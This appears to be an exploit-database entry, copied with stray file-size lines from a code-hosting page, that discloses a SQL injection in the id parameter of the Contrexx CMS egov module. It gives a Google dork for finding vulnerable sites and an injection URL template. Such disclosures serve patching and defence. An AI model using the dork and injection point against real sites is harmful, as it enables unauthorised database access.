11 lines
No EOL
368 B
Text
11 lines
No EOL
368 B
Text
# Exploit Title: Contrexx CMS:egov moudle SQL injection
|
|
# Google Dork: inurl:?section=egov
|
|
# Date: 12/9/2016
|
|
# Exploit Author: hamidreza borghei
|
|
# Software Link: https://www.cloudrexx.com/de/index.php?section=downloads&cmd=7&category=8
|
|
# Version: 1.0.0
|
|
# Tested on: linux
|
|
|
|
sql injection in id parameter:
|
|
|
|
http://server/index.php?section=egov&cmd=details&id=[sql query] |